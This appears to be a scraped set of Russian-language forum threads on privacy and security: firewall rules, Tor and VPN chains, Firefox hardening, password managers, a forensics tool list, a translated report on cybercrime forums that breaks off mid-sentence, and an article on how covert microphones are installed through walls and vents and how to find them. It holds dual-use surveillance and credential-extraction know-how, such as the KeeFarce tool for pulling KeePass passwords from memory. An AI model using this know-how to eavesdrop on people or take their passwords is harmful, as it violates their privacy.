Нужно понять, каким приложениям нужен выход в интернет, а каким нет. Самое главное приложение в системе - svchost.exe. Оно выполняет несколько очень важных функций, днс, время, впн и тд. Например, возьмем opendns, чтобы на него перенаправить трафик, нужно в настройке подключения указать айпи 208.67.220.220 и создать соответствующее правило

Также при использовании vpn этот процесс использует подключение

Также можно поставить галочки и указать айпишники сервера vpn. Замыкающим правилом для этого процесса должно быть обязательно

Почти для всех приложений по умолчанию ставим

Рассмотрим более детально правила для тора. Первое правило будет принимать входящие запросы от приложений

А второе, предавать трафик тора дальше

- Настройки брандмауэра. Имеет 5 положений. Самым оптимальным является режим обучения. Этот режим будет всегда предупреждать о том, что требуется делать с приложением, когда оно хочет сделать то, чего нету в правилах.

- Сетевые правила. Рассмотрим низкоуровневые правила

Суть заключается в полном запрете низкоуровневого трафика как входящего, так и исходящего

Сеть с 0.0.0.0 (128.0.0.0) до 128.0.0.0(128.0.0.0) означает любой айпи адрес v4, то есть весь интернет. Правила запрета всегда должны быть в самом низу

Если требуется разрешить низкоуровневый трафик, то необходимо создать правила выше чем блокирующее, например, пропуск трафика через эту машину. Здесь нужно понимать роутинг трафика, а именно то, что принимает трафик один интерфейс, а передает другой. И теперь задача сильно усложняется, ведь для каждого интерфейса требуется свое правило. Рассмотрим простой случай, где у нас один клиент и один виртуальный роутер, на котором стоит этот файервол. Клиент имеет айпи 192.168.2.3, айпи роутера 192.168.2.2 и 10.20.0.1. Например, клиенту нужно синхронизировать время, для этого он отправляет udp запрос на сервер синхронизации через порт 123. Роутер должен принять эти пакеты

Передать их на другой интерфейс и отправить дальше

Сервер обрабатывает запрос и делает ответ, нужно правило, для принятия этих пакетов

Далее передать на другой интерфейс и отправить обратно клиенту

Очень сложно понять какие айпи и куда их писать. С этим легко поможет журнал, находится он в вкладке инструменты => просмотр событий

Подробное описание всех соединений зависит от настройки.

Что же касаемо icmp, то тут снимем все галочки. Если потребуется пингануть какое-то устройство, то следует оставить несколько галочек на эхо запрос и эхо ответ

Есть еще так называемые глобальные правила, они распространяются сразу на все приложения. Служит это для экономии времени, если необходимо задать определенное правило сразу всем приложениям

Есть два варианта написания, до основных правил и после.

- Настройки LAN. Тут нужно удалить всю информацию

- Детектор атак. На первый взгляд очень важная функция, так и есть, но она будет часто срабатывать. Поэтому ее не стоит использовать в локальной сети

Если речь идет о роутере, который подключается к модему либо сама машина имеет внешний айпи, то там нужно выкручивать на максимум. И мониторить вкладку «Заблокированные атаки».

- Anti-leak. Просто замечательная опция. Суть заключается в предупреждении пользователя о действии приложения с последующем выбором разрешении либо запрета этого самого действия. Чем выше выкрутить ползунок, тем тщательней будут контролироватся все приложения

Но не стоит новичку выкрутить на максимум сразу ползунок. Это лишь приведет к ошибкам, ведь сам виндовс даже не сможет нормально загрузится. Поэтому сначала следует воспользоваться авто созданием правил и потом включать на максимум anti-leak. После нескольких перезагрузок можно выключить авто создание правил.

- Журнал. Неотъемлемой составляющей любого файервола являются логи

Не стоит сразу же выкрутить тут все на максимум (лучше оставить по умолчанию), это приведет к нагрузке на виртуальную машину, а именно на диск. Максимальный уровень регистрации допустим на машинах, которые имею внешний айпи адрес.

Вот собственно и вся настройка этого замечательного файервола. Есть еще версия со встроенным антивирусом так называемым «agnitum internet security». Но полагаю, что она не актуальна, ведь базы уже несколько лет как не обновляются.

Связка VPN-TOR-VPN на Whonix

ID: 676533bbb4103b69df371b6f
Thread ID: 59520
Created: 2021-11-30T21:36:38+0000
Last Post: 2021-12-22T14:10:16+0000
Author: Pegas
Replies: 102 Views: 4K

Приветствую камрады! Посоветуйте как совсем зеленому, но не совсем молодому. Вот по какому вопросу.

Действительно ли такая связка, VPN-TOR-VPN причем на Whonix-е гарантирует полную анонимность, или же все равно остаются следы? Спасибо.

[codeby] Paranoid II Курс по анонимности и безопасности [2020]

ID: 676533bbb4103b69df371ba1
Thread ID: 41154
Created: 2020-08-21T09:04:15+0000
Last Post: 2021-09-28T22:57:52+0000
Author: Eject
Prefix: Видео
Replies: 16 Views: 4K

Paranoid II — логическое продолжение курса по анонимности в сети Paranoid

Инструктор: ghost
О чем курс: О комплексе мер по защите информации, конфиденциальности;
Для кого этот курс: Для людей, нуждающихся в высокой степени конфиденциальности и защите информации;
Предоставим: Доступ к видео и текстовым материалам, а так же персональные консультации в рамках курса;
Что еще: Практические задания к каждому уроку.

Курс состоит из 10 уроков:

Настройка рабочего окружения. Улучшенная и переработанная работа с виртуальными машинами (пожалуй, единственная аналогия с предыдущим курсом);
Тонкая работа с разными криптовалютами;
Выбор, аренда, администрирование и защита VPS (70% работы в курсе проходит на серверах);
Подъём и настройка сервисов на VPS и работа с ними;
Тонкая работа с Tor-сервисами;
Выжимаем максимум из Raspberry Pi;
Анонимные роутеры;
Подъём, настройка и администрирование Tor-ноды;
Работа с железом ПК. Удаление аппаратных закладок;
Минимизация рисков и... авторские разработки.

Источник: <https://codeby.net/threads/paranoid-ii-kurs-po-anonimnosti-i- bezopasnosti.69596/>

You must have at least 50 message(s) to view the content.

Безопасно ли использовать KeePassXC и хранить пароль от VeraCrypt контейнера в нем?

ID: 676533bbb4103b69df371bd9
Thread ID: 48703
Created: 2021-02-27T12:55:00+0000
Last Post: 2021-07-05T18:28:24+0000
Author: 0x2d4_a8
Replies: 23 Views: 4K

Безопасно ли использовать KeePassXC и хранить пароль от VeraCrypt контейнера в нем?
KeePassXC - очень удобный инструмент, что бы не запоминать много паролей.
Сейчас для VeraCrypt контейнера использую пароль, придуманный мною, не простой, но конечно не такой стойкий если бы пароль был сгенерирован компьютером.
Сейчас задумался о том что бы сгенерировать сложный пароль и хранить его в KeePassXC, но безопасно ли это?
Нет ли у KeePassXC серьезных проблем с безопасностью? Использует ли его кто то?
Кто как хранит все свои пароли, приватные ключи, и тд?

Firefox Hardened

ID: 676533bbb4103b69df371bdc
Thread ID: 53299
Created: 2021-06-25T09:37:32+0000
Last Post: 2021-06-26T19:22:59+0000
Author: crx
Prefix: Статья
Replies: 15 Views: 4K

На других сайтах есть различные аналогичные руководства, но многие из этих руководств были частично неполными, поэтому я попытался написать максимально полное руководство, которое может быть использовано такими параноидальными пользователями, как я.

Это лучший способ улучшить Firefox. Напомню, что наша цель - конфиденциальность. Если вы хотите просматривать веб-страницы анонимно, я предлагаю вам вместо этого взглянуть на Tor Browser.

Самый простой и быстрый способ получить лучшую конфигурацию для Firefox - использовать файл user.js от Arkenfox (https://github.com/arkenfox/user.js/). Проект Arkenfox предоставляет шаблон user.js для настройки и усиления Firefox, который дает нам идеальную основу для нашего браузера, ориентированного на конфиденциальность.

## Создаём новый профиль с настройками от Arkenfox.

Переходим в about:profiles, слева вверху нажимаем "Create a New Profile", в появившемся окне нажимаем Continue, указываем имя нового профиля (опционально

каталог расположения нового профиля) и жмём Finish. Листаем страничку вниз, находим наш новый профиль и запоминаем расположение каталога. В терминале переходим в этот каталог $ cd ~/.mozilla/firefox/a2bmu1ne.qwerty (название у вас будет отличаться от моего) и качаем файл user.js в этот каталог wget -q <https://github.com/arkenfox/user.js/raw/master/user.js>.

Теперь снова открываем страничку about:profiles, листаем к нашему новому профилю и жмём "Launch profile in new browser". По желанию можете назначить этот профиль по умолчанию "Set as default profile".

## Поисковые системы, которые заботятся о вашей конфиденциальности

Searx (https://searx.me/) - свободный метапоисковый движок с открытым исходным кодом. Можно выбрать из списка https://searx.space либо установить на свой сервер. (Крайний раз, когда я у себя его разворачивал, особой настройки не требовалось, как и ресурсов, движок парсит другие поисковики (Google, Bing, Yandex, etc)). Для добавления в Firefox выберите один из https://searx.space и ПКМ по адресной строке -> "Add searx".

### Другие поисковики
Metager (https://metager.org/): еще один бесплатный механизм метапоиска, управляемый некоммерческой организацией из Германии. Предпочтительнее DDG, но не SearX.

DDG Lite (https://html.duckduckgo.com/html/): это Duckduckgo, но без JavaScript, поэтому они могут как можно меньше отслеживать вас (Duckduckgo не следует доверять). Особого смысла пользоваться конкретно версией Lite нет, достаточно отключить JavaScript в uBlock Origin или установить NoScript и можно пользоваться https://duckduckgo.com. Но лично я не особо доверяю DDG.

Quant (https://www.qwant.com/): поисковая система, которая заявляет что не отслеживает пользователей (non-free). Не заметил чтобы фильтровал поисковую выдачу, по запросу "купить %запрещённые вещества% в Москве" выдал кучу ссылок. Cookies/Local storage не использует, я проверил.

Mojeek (https://www.mojeek.com/): независимая поисковая система, базирующаяся в Великобритании, которая утверждает, что не отслеживает своих пользователей (non-free). Не тестил.

YaCy (https://yacy.net/): свободная децентрализованная одноранговая поисковая система. Это уникальная и отличная идея, хотя она плохо работает.

## Мастхэв дополнения

uBlock Origin (<https://addons.mozilla.org/en-US/firefox/addon/ublock- origin/>): в представлении не нуждается. Но для тех, кто не знает всё же напишу - лучший блокировщик рекламы с открытым исходным кодом, сочетающий в себе возможности NoScript и uMatrix. Потребляет мало памяти. Правильно настроенный uBlock Origin будет вашим лучшим другом против рекламы, трекеров и аналитики.
Я предлагаю вам включить расширенный режим. Настоятельно рекомендуется отключить JavaScript по умолчанию. Вы можете включить его для определенных сайтов, когда вам это нужно. Блокировка JavaScript, вероятно, лучшее, что мы можем сделать для сохранения конфиденциальности.

LocalCDN (<https://addons.mozilla.org/en-US/firefox/addon/localcdn-fork-of- decentraleyes/>): LocalCDN - это форк хорошо известного Decentraleyes. Он лучше, чем Decentraleyes, в том смысле, что предоставляет настраиваемые правила для использования внутри uBlock Origin, поэтому эти дополнения лучше работают вместе. Он перехватывает запросы к CDN и отдаёт контент локально что исключает трекинг от ClaudFlare и других CDN.
Как работает: запрос на <https://cdnjs.cloudflare.com/ajax/libs/font- awesome/5.15.3/css/all.min.css> будет перехвачен и отдастся локальный файл. Это не только повысит вашу конфиденциальность, но и ускорит загрузку страниц если вы используете медленное подключение.
После установки LocalCDN идём в его настройки, вкладка Advanced, внизу выбираем uBlock и копируем содержимое. Закрываем вкладку, больше мы сюда возвращаться не будем. Идём в настройки uBlock, ставим галочку на "I am an advanced user", идём во вкладку "My rules" и в правое окошко вставляем наши правила из LocalCDN. Жамкаем "Save", жамкаем "Commit". Это всё.

## Менеджер паролей

Вы должны использовать надежный менеджер паролей для создания и хранения паролей.

Я (автор оригинальной статьи) бы порекомендовал Bitwarden, который открыт и бесплатен (https://github.com/bitwarden), но я(переводчик) не стал бы тащить на десктоп TypeScript и C# на сервер. Решение принимать вам.

Для параноиков, которые не хотят хранить свои пароли на удалённых серверах, есть KeePassXC (https://keepassxc.org/), который также является бесплатным и открытым программным обеспечением. Его преимущество заключается в том, что ваши пароли хранятся только в локальной, надежно зашифрованной базе данных, поэтому они никогда не покинут ваш компьютер, если вы этого не захотите. Вы можете использовать Syncthing, чтобы синхронизировать их между вашими разными машинами без какого-либо сервера.

Третий вариант (только для джедаев терминала) - это GNU Pass (https://www.passwordstore.org/), простой менеджер паролей, который следует философии Unix. Пароли хранятся в ~/.password-store, зашифрованные вашим ключом GPG.

### Рекомендуемые дополнения

Это аддоны, которые обычно рекомендуются, но, в отличие от uBlock или LocalCDN, они требуют некоторых действий от вас (на самом деле, не так уж много).

Примите во внимание, что некоторые из этих надстроек могут дублировать друг друга и что, когда у вас включен JavaScript, они могут отслеживать вас по используемым надстройкам, поэтому я бы рекомендовал использовать минимальное количество надстроек, насколько это возможно, не жертвуя важными функции конфиденциальности. Поэтому найдите свой баланс между количеством надстроек и преимуществами, которые они предоставляют.

Cookie AutoDelete (<https://addons.mozilla.org/en-US/firefox/addon/cookie- autodelete/>): этот аддон удаляет файлы cookie каждый раз, когда вы закрываете вкладку или выходите из браузера. Но он может делать гораздо больше, например, очистку локального хранилища, очистку при смене домена, удаление кеша, белых и серых списков, очистку при смене домена и т. Д.

Это настолько мощный инструмент, что его также можно настроить для использования с контейнерами (вы должны включить настройку для этого), и он особенно полезен, если вы не используете ни контейнеры, ни FPI (далее в статье).

ClearURLs (https://addons.mozilla.org/en-US/firefox/addon/clearurls/): аддон автоматически удаляет элементы отслеживания из URL-адресов (это часто используемая стратегия для отслеживания вас), и его очень просто использовать. В редких случаях сайт может перестать работать, если вы очистите некоторые параметры из URL, но если вы это заметили, вам нужно временно отключить этот аддон. Легко, правда?

Temporary Containers (<https://addons.mozilla.org/firefox/addon/temporary- containers/>): контейнеры в Firefox одна из самых крутых фич, на мой взгляд. Они изолируют хранилище данных веб-сайтов (файлы cookie, хранилище и т.д.) друг от друга. Вам нужно только включить автоматический режим, и аддон сотворит чудеса за вас. Однако вы не можете использовать его в приватном окне и он может немного замедлить работу вашего браузера (поскольку создаёт контейнер для каждой новой вкладки).

Я (переводчик) активно использую Multi-Account Containers (https://addons.mozilla.org/firefox/addon/multi-account-containers/). Это те же самые изолированные контейнеры, но с постоянным хранением данных веб- сайтов. Есть возможность настройки автоматического открытыия сайта в нужном контейнере.

ETag Stoppa (https://addons.mozilla.org/firefox/addon/etag-stoppa/): не позволяет вашему браузеру сохранять теги сущностей, удаляя заголовки ответов ETag (https://ru.wikipedia.org/wiki/HTTP_ETag) без исключений. Это необходимо только в том случае, если вы не используете временные контейнеры, и это отличная команда с Cookie AutoDelete.

CanvasBlocker (https://addons.mozilla.org/firefox/addon/canvasblocker/): CanvasBlocker - идеальный аддон для тех, кому нужно включить JavaScript. Он не позволяет веб-сайтам использовать некоторые API-интерфейсы JavaScript для отслеживания вас. У него есть разные уровни, и это действительно полезно, если вы хотите подделать свой отпечаток пальца. Это может сломать некоторые сайты, хотя у меня никогда не было проблем с этим аддоном. Просто работает.

xBrowserSync (https://addons.mozilla.org/firefox/addon/xbs/): ваш личный сервер синхронизации.

AdNauseam (https://addons.mozilla.org/en-US/firefox/addon/adnauseam/): не только блокирует рекламу, но и скрывает данные просмотра, чтобы противодействовать отслеживанию со стороны индустрии онлайн-рекламы. Чтобы избавиться от рекламных сетей, AdNauseam «нажимает» на заблокированные и скрытые объявления, загрязняя ваш цифровой профиль и создавая шум в экосистеме, которая управляет онлайн-наблюдением. Он использует uBlock в качестве основы, поэтому вы также получаете все, на что способен uBlock.
Это идеальный аддон, если вы хотите громко крикнуть: «Гугл, да пошел ты!».

Privacy Redirect (<https://addons.mozilla.org/en-US/firefox/addon/privacy- redirect/>): редиректит запросы Twitter, YouTube, Instagram, Reddit и Google Maps на безопасные и бесплатные альтернативы (Nitter, Invidious, OpenStreetMap, Libreddit). Он также поддерживает настраиваемые серверы, поэтому вы можете использовать его со своими экземплярами, размещенными на собственном хостинге!

## Дополнительные настройки about:config

Хотя Arkenfox предоставил нам отличный шаблон, я обнаружил, что есть несколько других настроек, которые могут еще больше повысить нашу конфиденциальность. Вам нужно будет зайти в свой about:config (конечно, в новом профиле!). Щелкните, чтобы принять риски и продолжить. Я перечислю вам некоторые из моих рекомендуемых настроек, вы можете сами оценить, нужна ли вам одна из функций, которые мы отключаем.

Cледующие изменения будут разделены на три уровня: настройки базового уровня ничего не сломают, изменения стандартного уровня могут вызвать незначительные неудобства, а настройки расширенного уровня могут сломать определенные сайты, но не беспокойтесь, так как я предлагаю простой способ исправления.

# Базовый уровень

Предварительная загрузка

Измените network.dns.disablePrefetch на true и network.prefetch-next на false (предварительная загрузка может немного ускорить загрузку, но она не так заметна, и ее отключение не позволяет вашему браузеру подключаться к серверам без участия пользователя).

Отключение JavaScript в PDF

Переключите pdfjs.enableScripting на false (вы по-прежнему сможете просматривать PDF-файлы в Firefox).

Полное отключение Pocket

Измените browser.newtabpage.activity-stream.section.highlights.includePocket на false и extensions.pocket.enabled на false (Pocket должен был быть отключен в настройках от Arkenfox, но не отключен.)

## Средний уровень

Отключение поддержки геолокации geo.enabled false

Отключение WebRTC : media.peerconnection.enabled и media.navigator.enabled на false. (ВНИМАНИЕ: установка значения false может нарушить работу некоторых сайтов, особенно некоторых популярных программ видеозвонков.)

Отключение DRM : media.gmp-widevinecdm.enabled и media.eme.enabled на false нарушит работу некоторых сайтов, требующих DRM, например Apple Music точно работать не будет.

## Продвинутый уровень

Для пользователей продвинутого уровня я настоятельно рекомендую вам Privacy Settings addon (https://addons.mozilla.org/firefox/addon/privacy-settings/), который позволяет нам временно отключить некоторые настройки, чтобы вы могли исправить неработающие сайты, не отключая настройки конфиденциальности навсегда. Это очень полезно, если вы научитесь им пользоваться.

FPI : Измените privacy.firstparty.isolate на true. Это важная настройка, поскольку она изолирует файлы cookie и блокирует межсайтовое отслеживание.

Борьба с отпечатками : измените privacy.resistFingerprinting на true. Это может привести к некоторым проблемам с производительностью, но мне нравится включать это. Пользуюсь им уже давно и проблем никогда не возникало.

Отключение referer-заголовка : network.http.referer.XOriginPolicy на 2. Это нарушит работу некоторых сайтов, особенно тех, которые имеют формы и логины.

0 = Отправлять реферера во всех случаях.
1 = Отправить Referer на те же сайты eTLD.
2 = Отправлять Referer только при совпадении полных имен хостов.

TEH END.

Это вольный перевод, оригинал статьи можно прочесть здесь https://ebin.city/~werwolf/posts/firefox-hardening-guide/

Ссылки по теме

[ Firefox/Privacy - ArchWiki

](https://wiki.archlinux.org/title/Firefox/Privacy)

wiki.archlinux.org

habr.com

[ Ð£Ð¼ÐµÑÐµÐ½Ð½ÑÐ¹ Hardening Ð´Ð»Ñ Firefox

](https://habr.com/ru/post/445124/)

![habr.com](/proxy.php?image=https%3A%2F%2Fassets.habr.com%2Fhabr- web%2Fimg%2Ffavicons%2Ffavicon-16.png&hash=92e2dae146214fab23606c51ef42d36d&return_error=1) habr.com

Физическая прослушка: методы и защита.

ID: 676533bbb4103b69df371c09
Thread ID: 31085
Created: 2019-08-15T11:22:58+0000
Last Post: 2021-04-15T08:59:52+0000
Author: nullx
Prefix: Статья
Replies: 15 Views: 4K

Вы, наверное, часто видели в фильмах, когда рядом с объектом стоит микроавтобус, а в нем сидят бравые ребята и осуществляют аудио и видео контроль. А теперь остановимся на этом по-подробнее. Запомните, если контролируют государевы службы, то никаких микроавтобусов не будет, все информация передается по проводам , используются как силовые линии (220в), так слаботочка (цепи сигнализации , телефонные линии), сигнал передается на поднесущей частоте (очень похожа на технологию dsl).

Оперативно-технические службы не используют радиодиапазон как канал передачи сигнала (в редких случая бывают исключения), а вот частные детективы или коммерческие службы безопасности - да, так как не имеют доступ к сети СОРМ и используют воздушку (радиодиапазон) на все 100%. По способу установки, СТС (специальные технические средства, а в народе жучки) делятся на беззаходовый метод (да есть и такие) и с заходом. Сейчас я подробно остановлюсь на каждом методе.

СТС - Специальные Технические Средства

Беззаходовый метод.
Рассмотрим беззаходовый метод. Наверное, первое что приходит вам на ум - это лазерный направленный микрофон, гидрофон или стетоскоп, такие СТС есть, но они экзотические. Скажу понятнее, эти средства спецслужбы практически не используют, максимум в очень крайних случаях, в силу того, что звук получается очень плохого качества, и не всегда получится очистить его средствами шумоочистки. На самом деле, используют немного другие средства, а именно проводные микрофоны.

Специалисты, которые устанавливают СТС, прекрасно разбираются не только в электронике, но и в строительстве.

Click to expand...

Первое что они делают - получают план конструкции помещения, будь то многоквартирный дом или отдельно стоящее здание. Запрашивается он у служб, которые им располагают (архитектурные, инвентаризационные итд). Далее проводные микрофоны спускают либо по вентиляционном каналам, либо просверливают отверстия в стене с помощью бесшумных установок (на сленге спецов такой аппарат называется пескоструй).

Поняли для чего план берется? В нем указана толщина стен, прилегающие вент. каналы, а также перепланировка, если такая была, да и вообще много технической информации (всех секретов раскрывать не буду). По итогу, в помещении, которое берется под контроль будет маленькая дырочка размером с пару миллиметра.

В нее вставляется звуковод (что-то вроде соломки которой мы пьем соки), на обратной стороне вставляется микрофон, дальше по цепи 220 или сразу на свободную пару в телефонный шкаф. Иногда используют волновод (это еще один вид лазерного микрофона). Скажу сразу, что таким методом установки владеют только люди с очень серьезным уровнем подготовки. А также такие методы прослушки сложно выявляются специальным оборудованием, но об этом поговорим позже.

Заходовый метод.
Заходовые способы установки, как вы уже догадались, осуществляются с заходом в контролируемое помещение. Суть метода проста - установка СТС связана с проникновением на объект. Вообще, много всех тонкостей, можно написать целую книгу, в двух словах так просто не рассказать. Но сейчас мы подходим к главному вопросу - как защититься от всего этого дерьма?

Противодействие.
Вы, наверное, видели в интернете организации, которые предлагают услуги по поиску СТС. Сейчас попробую более-менее рассказать про их работу, а также рассказать про оборудование, которое они используют.

В основном, такая мобильная группа комплектуется комплексами по мониторингу: как радиоэфира, так и проводных коммуникаций. Также есть такой прибор, который называется нелинейный локатор (он позволяет выявить любые электронные устройства, которые имеют в своем составе транзисторы или микросхемы). Рентгеновское и ультразвуковое оборудование. Кроме всего этого, используются эндоскопы, металлодетекторы и много всего сопутствующего.

К сожалению, при многообразии всей техники для выявления СТС, что предлагается на рынке, рынок переживает застой, как ни печально, но мы давно плетемся позади.

Click to expand...

Компании зачастую используют устаревшее оборудование, либо квалификация сотрудников желает лучшего. Когда задаешь простой, казалось бы, вопрос, «как ищете микрофоны в пермолойдной оболочке?» - оказывается, что люди даже не слышали про такой вид микрофона (а между тем он используется очень часто и не выявляется нелинейным локатором). Комплексы же по выявлению СТС, которые используют радиодиапазон и проводные коммуникации в большинстве случаев построены на базе сканирующих приемников. К слову, практически все радиосканеры имеют мертвые точки, и если радиозакладка работает на частоте мертвой точки, то комплекс ее просто не видит.

Поэтому, прежде чем приглашать спецов, пусть озвучат какое оборудование используют. Для выявления закладок в радиодиапазоне должен быть анализатор спектра, обязательно с опцией векторного анализа, и минимальная верхняя частота хотя бы 20 ггц, а в идеале до 100 ггц.

Вернемся к нелинейным локаторам. Локатор должен быть двухдиапазонным или их должно быть два, обычно это частоты 900 мгц и 2.5 ггц. Если используют только один 900 мгц, то дайте им обычную симку, пусть попробуют найти)). Отдельно стоят комплексы проводных коммуникаций, они позволяют выявлять закладки которые подключены, как к сети сигнализации, сети 220 в, телефонным линиям и тд. Диапазон на сканирование по поднесущим от 100 кгц до 30 мгц уже на данный момент очень мал, есть устройства которые работают до 100 мгц. Неплохой комплекс «ТАЛАН», как вспомогательный, очень рекомендую. При исследовании на СТС обязательно должна проводится рентгеноскопия или ультразвуковой анализ конструкций на инородные тела. Естественно, все измерительные средства также должны быть проверены.

источник : канал(Отдел К)

Computer Forensics (азы компьютерно-технической экспертизы)

ID: 676533bbb4103b69df371c16
Thread ID: 29584
Created: 2019-05-31T14:02:12+0000
Last Post: 2021-03-28T01:14:40+0000
Author: tabac
Prefix: Статья
Replies: 5 Views: 4K

Для того чтобы успешно проводить расследования инцидентов информационной безопасности необходимо обладать практическими навыками работы с инструментами по извлечению цифровых артефактов. В этой статье будет представлен список полезных ссылок и инструментов для проведения работ по сбору цифровых доказательств. Речь об азах и общедоступном софте.

Термин "forensics" является сокращенной формой "forensic science", дословно "судебная наука", то есть наука об исследовании доказательств — именно то, что в русском именуется криминалистикой. Русский термин "форензика" означает не всякую криминалистику, а именно компьютерную.

Некоторые авторы разделяют компьютерную криминалистику (computer forensics) и сетевую криминалистику (network forensic).

Для полноценного сбора и анализа информации используются различные узкоспециализированные утилиты, которые будут рассмотрены ниже. Хочу предупредить, что при проведении работ по заключению в том или уголовном деле скорее всего будет рассматриваться наличие тех или иных сертификатов и соответствий ПО (лицензии ФСТЭК). В этом случае придется использовать комбинированные методы по сбору и анализу информации, либо писать выводы и заключение на основании полученных данных из несертифицированных источников.

Фреймворки

dff — Digital Forensics Framework — платформа с открытым исходным кодом для проведения работ по извлечению и исследованию данных.
PowerForensics — PowerForensics утилита, написанная на PowerShell, предназначенная для исследования жестких дисков.
The Sleuth Kit — The Sleuth Kit (TSK) — это библиотека на языке C и коллекция инструментов командной строки, которые позволяют исследовать образы дисков.

Реал-тайм утилиты

grr — GRR Rapid Response: инструмент для расследования и анализа инцидентов.
mig — Mozilla InvestiGator — распределенная реал-тайм платформа для расследования и анализа инцидентов.

Работа с образами (создание, клонирование)

dc3dd — улучшенная версия консольной утилиты dd.
adulau/dcfldd — еще одна улучшенная версия dd.
FTK Imager — FTK Imager- просмотр и клонирования носителей данных в среде Windows.
Guymager — просмотр и клонирования носителей данных в среде Linux.

Извлечение данных

bstrings — улучшенная версия популярной утилиты strings.
bulk_extractor — выявления email, IP-адресов, телефонов из файлов.
floss эта утилита использует расширенные методы статического анализа для автоматической деобфускации данных из двоичных файлов вредоносных программ.
photorec — утилита для извления данных и файлов изображений.

Работа с RAM

inVtero.net — фреймворк, отличающийся высокой скоростью работы.
KeeFarce — извлечение паролей KeePass из памяти.
Rekall — анализ дампов RAM, написанный на python.
volatility — Volatility Framework представляет собой набор утилит для разностороннего анализа образов физической памяти.
VolUtility — веб-интерфейс для Volatility framework.

Сетевой анализ

SiLK Tools — инструменты для анализа трафика для облегчения анализа безопасности крупных сетей.
Wireshark — известнейший сетевой сниффер.

Артефакты Windows (извлечение файлов, историй загрузок, USB устройств и т.д.)

FastIR Collector — обширный сборщик информации о системе Windows (реестр, файловая система, сервисы, автозагрузка и т.д.)
FRED — кросплатформенный анализатор реестра Windows.
MFT-Parsers — лист сравнения MFT-парсеров (MFT — Master File Table).
MFTExtractor — MFT-парсер.
NTFS journal parser — парсер журналов NTFS.
NTFS USN Journal parser — — парсер журналов USN.
RecuperaBit — восстановление NTFS данных.
python-ntfs — анализ NTFS данных.

Исследование OS X

OSXAuditor — OS X аудитор.

Internet Artifacts

chrome-url-dumper — извлечение информации из Google Chrome.
hindsight — анализ истории Google Chrome/Chromium.

Анализ временных интервалов

plaso — извлечение и агрегация таймстапов.
timesketch — анализ таймстапов.

Hex редакторы

0xED — HEX редактор OS X.
Hexinator — Windows версия Synalyze It.
HxD — маленький и быстрый HEX редактор.
iBored — кросс-платформенный HEX редактор.
Synalyze It! — HEX редактор в тимплейтами.
wxHex Editor — кросс-платформенный HEX редактор со сравнением файлов.

Конверторы

CyberChef — мультиинструмент для кодирования, декодирования, сжатия и анализа данных.
DateDecode — конвертирование бинарных данных.

Анализ файлов

010 Editor Templates — тимплейты для редактора 010.
Contruct formats — парсер различных видов файлов на python.
HFSPlus Grammars — HFS+ составляющие для Synalysis
Sleuth Kit file system grammars — составляющие для различных файловых систем.
Synalyse It! Grammars — файловые составляющие для Synalyze It!
WinHex Templates — файловые составляющие для WinHex и X-Ways

Обработка образов дисков

imagemounter — утилита командной строки для быстрого монтирования образов дисков
libewf — Libewf библиотека и утилиты доступа и обработки форматов EWF, E01.
xmount — конвертирования образов дисков.

Университет Кибербезопасности и Анонимности 2.0

ID: 676533bbb4103b69df371c48
Thread ID: 44545
Created: 2020-11-19T19:10:39+0000
Last Post: 2021-02-04T16:25:04+0000
Author: balabashka
Prefix: Мануал/Книга
Replies: 17 Views: 4K

Ты научишься:

Безопасность:

Хакинг:

Вирусология:

Соц. инженерия:

Ссылка: Клац

Киберпреступные форумы навсегда - Часть 1: Киберкрайм никогда не умрет

ID: 676533bbb4103b69df371c4e
Thread ID: 46310
Created: 2021-01-04T16:24:29+0000
Last Post: 2021-01-31T06:30:40+0000
Author: R3SET
Prefix: Статья
Replies: 15 Views: 4K

Отчет Digital Shadows о современных киберпреступных форумах - переведено (1/3)!
Особое внимание уделяется русскоязычным ресурсам, в связи с чем предлагаю также вспомнить арест одного из админов XSS: <https://dev.by/news/hacker-from- rechitsa>
Прочитать оригинал этого материала на английском можно [здесь](https://www.digitalshadows.com/blog-and-research/forums-are-forever- part-1-cybercrime-never-dies/).

Если бы кто-нибудь мог предсказать будущее в конце 1990-х, когда появились первые киберпреступные форумы, мало кто предположил бы, что такая модель общения сохранится и в новом тысячелетии.
Выживание форумов, на которых общаются киберпреступники, перед лицом новых, более безопасных технологий и постоянного давления со стороны правоохранительных органов не стало сюрпризом для исследователей Digital Shadows. В отчете «[The Modern Cybercriminal Forum](https://resources.digitalshadows.com/whitepapers-and-reports/the- modern-cybercriminal-forum)» мы собрали вместе обширные исследования и «живые» представления о киберпреступном андеграунде.
Результаты исследования включают несколько важных выводов:

Альтернативные технологии : по мере того, как продолжают появляться новые форумы и увеличиваться количество их участников, пользователи выражают нежелание переходить на другие платформы для своих коммуникационных и торговых потребностей. Они видят недостатки в альтернативных технологиях, несмотря на предполагаемую безопасность и эффективность. Многие злоумышленники обеспокоены безопасностью новых технологий и по-прежнему верят в анонимность и защиту, которые предлагают доверенные форумы.
Родословная : Многие форумы имеют богатую историю и уважаемую родословную, что очень нравится киберпреступникам. Достопочтенные форумы, как правило, привлекают опытных злоумышленников и служат большим хранилищем знаний.
Достоверность : используя мессенджеры или торговые площадки, работающие на платформе электронной коммерции Automated Vending Carts (AVC), злоумышленникам сложно определить, с кем они имеют дело. Но системы репутации на форумах и доступная всем история сообщений предоставляют ценные сведения о надежности других "партнеров".
Системы арбитража и условного депонирования : системы арбитража и условного депонирования форумов обеспечивают честные сделки и блокировку нарушителей. Трудно отрицать привлекательность этой функции, когда один киберпреступник хочет заключить сделку с другим.
Реклама : форумы не только предлагают пространство для общения и торговли, они также предоставляют пользователям ценные рекламные места с широким охватом пользователей.
Сообщество : преимущества опытного сообщества ценится участниками форума, которые дают и получают советы и учатся на ошибках друг друга.

История форумов

Начиная с начала 1970-х годов, форумы являются одними из самых ранних и основных технологий интернет-коммуникации. Появление кардингового форума CarderPlanet в первые годы нового тысячелетия закрепило устоявшуюся модель, которой подражают почти все новые ресурсы. Киберпреступники по-прежнему используют форумы для получения советов и обсуждения новейших технологий и разработок. Продавцы обычно предлагают такие товары, как:

доступ к внутренним системам
аккаунты
базы данных
софт
вредоносное ПО
данные кредитных карт
учебники по киберпреступности

После неуклюжей модели цепочек и публикаций, используемой на форумах, появилось несколько коммуникационных и торговых технологий, предлагающих повышенную эффективность, удобство и безопасность. Существуют службы обмена сообщениями и зашифрованные приложения, такие как Telegram, Wickr и Discord, а также децентрализованные технологии, такие как DNS, i2P и BitTorrent. Автоматические торговые платформы также прижились в этой среде.
Наряду с появлением таких технологий, форумы оказались опасной - и устаревшей

